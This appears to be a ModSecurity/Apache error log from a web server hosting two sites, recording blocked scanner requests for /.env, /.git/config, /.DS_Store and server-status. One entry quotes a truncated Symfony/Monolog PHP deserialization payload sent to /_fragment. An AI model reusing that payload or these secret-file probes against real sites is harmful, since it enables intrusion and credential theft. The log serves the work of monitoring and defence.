[Sun Nov 30 08:08:20.317708 2025] [:error] [pid 421119] [client 209.38.248.17:56566] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSvtZGrgxAKq5wr-vwxzjAAAAAY"]
[Sun Nov 30 08:08:20.317899 2025] [:error] [pid 421119] [client 209.38.248.17:56566] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSvtZGrgxAKq5wr-vwxzjAAAAAY"]
[Sun Nov 30 08:08:21.101720 2025] [:error] [pid 420136] [client 209.38.248.17:43516] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvtZdiFrAxD373c7PfgHwAAAAQ"]
[Sun Nov 30 08:08:21.101941 2025] [:error] [pid 420136] [client 209.38.248.17:43516] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvtZdiFrAxD373c7PfgHwAAAAQ"]
[Sun Nov 30 08:08:21.102111 2025] [:error] [pid 420136] [client 209.38.248.17:43516] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvtZdiFrAxD373c7PfgHwAAAAQ"]
[Sun Nov 30 08:08:21.766657 2025] [:error] [pid 421121] [client 209.38.248.17:43518] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSvtZVoLn9vgVb4y1wTXRgAAAAo"]
[Sun Nov 30 08:08:21.766887 2025] [:error] [pid 421121] [client 209.38.248.17:43518] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSvtZVoLn9vgVb4y1wTXRgAAAAo"]
[Sun Nov 30 08:08:21.767078 2025] [:error] [pid 421121] [client 209.38.248.17:43518] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSvtZVoLn9vgVb4y1wTXRgAAAAo"]
[Sun Nov 30 12:17:38.037507 2025] [:error] [pid 427794] [client 23.166.88.142:54190] [client 23.166.88.142] ModSecurity: Warning. Found 30 byte(s) in ARGS:_path outside range: 1-255. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "482"] [id "920270"] [msg "Invalid character in request (null character)"] [data "ARGS:_path=_controller=Symfony\\x5cComponent\\x5cYaml\\x5cInline::parse&value=!!php/object:a:1:{i:1;a:2:{i:0;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;N;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:2:\\x22-1\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_fragment"] [unique_id "aSwn0mVH58R9wRlXzSwxiQAAADs"]
[Sun Nov 30 13:30:11.060901 2025] [authz_core:error] [pid 421122] [client 46.101.111.185:43348] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 30 13:30:12.527324 2025] [:error] [pid 427794] [client 46.101.111.185:43376] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSw41GVH58R9wRlXzSwxkwAAADs"]
[Sun Nov 30 13:30:12.527571 2025] [:error] [pid 427794] [client 46.101.111.185:43376] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSw41GVH58R9wRlXzSwxkwAAADs"]
[Sun Nov 30 13:30:12.527771 2025] [:error] [pid 427794] [client 46.101.111.185:43376] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSw41GVH58R9wRlXzSwxkwAAADs"]
[Sun Nov 30 13:30:13.845035 2025] [:error] [pid 427776] [client 46.101.111.185:43382] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSw41RlsVScx5wrU222RbwAAACk"]
[Sun Nov 30 13:30:13.845280 2025] [:error] [pid 427776] [client 46.101.111.185:43382] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSw41RlsVScx5wrU222RbwAAACk"]
[Sun Nov 30 13:30:13.845460 2025] [:error] [pid 427776] [client 46.101.111.185:43382] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSw41RlsVScx5wrU222RbwAAACk"]
[Sun Nov 30 13:30:14.407661 2025] [:error] [pid 421120] [client 46.101.111.185:43398] [client 46.101.111.185] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSw41l1RgwzjQxTFQvL84QAAAAg"]
[Sun Nov 30 13:30:14.407899 2025] [:error] [pid 421120] [client 46.101.111.185:43398] [client 46.101.111.185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSw41l1RgwzjQxTFQvL84QAAAAg"]
[Sun Nov 30 13:30:14.408067 2025] [:error] [pid 421120] [client 46.101.111.185:43398] [client 46.101.111.185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSw41l1RgwzjQxTFQvL84QAAAAg"]
[Sun Nov 30 16:35:35.493366 2025] [authz_core:error] [pid 427794] [client 147.182.200.94:46070] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 30 16:35:37.044079 2025] [:error] [pid 429217] [client 147.182.200.94:46104] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSxkSUR0pJY8_qkvKEEfogAAAAM"]
[Sun Nov 30 16:35:37.044326 2025] [:error] [pid 429217] [client 147.182.200.94:46104] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSxkSUR0pJY8_qkvKEEfogAAAAM"]
[Sun Nov 30 16:35:37.044507 2025] [:error] [pid 429217] [client 147.182.200.94:46104] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSxkSUR0pJY8_qkvKEEfogAAAAM"]
[Sun Nov 30 16:35:37.544533 2025] [:error] [pid 421120] [client 147.182.200.94:46118] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSxkSV1RgwzjQxTFQvL88QAAAAg"]
[Sun Nov 30 16:35:37.544761 2025] [:error] [pid 421120] [client 147.182.200.94:46118] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSxkSV1RgwzjQxTFQvL88QAAAAg"]
[Sun Nov 30 16:35:37.544915 2025] [:error] [pid 421120] [client 147.182.200.94:46118] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSxkSV1RgwzjQxTFQvL88QAAAAg"]
[Sun Nov 30 16:35:38.047668 2025] [:error] [pid 427773] [client 147.182.200.94:46128] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSxkSnJWCyvffcL8eFn61QAAACc"]
[Sun Nov 30 16:35:38.047941 2025] [:error] [pid 427773] [client 147.182.200.94:46128] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSxkSnJWCyvffcL8eFn61QAAACc"]
[Sun Nov 30 16:35:38.048128 2025] [:error] [pid 427773] [client 147.182.200.94:46128] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSxkSnJWCyvffcL8eFn61QAAACc"]
[Sun Nov 30 19:53:56.994878 2025] [:error] [pid 421122] [client 34.44.184.120:40882] [client 34.44.184.120] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSySxC6tRBnriPIR7Vg57AAAAAw"]
[Sun Nov 30 19:53:56.995125 2025] [:error] [pid 421122] [client 34.44.184.120:40882] [client 34.44.184.120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSySxC6tRBnriPIR7Vg57AAAAAw"]
[Sun Nov 30 19:53:56.995300 2025] [:error] [pid 421122] [client 34.44.184.120:40882] [client 34.44.184.120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSySxC6tRBnriPIR7Vg57AAAAAw"]
[Mon Dec 01 14:04:02.370256 2025] [:error] [pid 441950] [client 45.153.34.233:52564] [client 45.153.34.233] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS2SQpKQGCdmZajO72J8DQAAAAA"]
[Mon Dec 01 14:04:02.370630 2025] [:error] [pid 441950] [client 45.153.34.233:52564] [client 45.153.34.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS2SQpKQGCdmZajO72J8DQAAAAA"]
[Mon Dec 01 14:04:02.370808 2025] [:error] [pid 441950] [client 45.153.34.233:52564] [client 45.153.34.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS2SQpKQGCdmZajO72J8DQAAAAA"]
[Mon Dec 01 14:39:09.942910 2025] [authz_core:error] [pid 441950] [client 165.22.34.189:36448] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Dec 01 14:39:10.868830 2025] [:error] [pid 441984] [client 165.22.34.189:36470] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS2afkMV7uHmQCJNjA-66AAAAAU"]
[Mon Dec 01 14:39:10.869075 2025] [:error] [pid 441984] [client 165.22.34.189:36470] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS2afkMV7uHmQCJNjA-66AAAAAU"]
[Mon Dec 01 14:39:10.869285 2025] [:error] [pid 441984] [client 165.22.34.189:36470] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS2afkMV7uHmQCJNjA-66AAAAAU"]
[Mon Dec 01 14:39:11.156799 2025] [:error] [pid 441952] [client 165.22.34.189:36480] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS2af-BxagKneyKPxx8p7QAAAAI"]
[Mon Dec 01 14:39:11.157060 2025] [:error] [pid 441952] [client 165.22.34.189:36480] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS2af-BxagKneyKPxx8p7QAAAAI"]
[Mon Dec 01 14:39:11.157222 2025] [:error] [pid 441952] [client 165.22.34.189:36480] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS2af-BxagKneyKPxx8p7QAAAAI"]
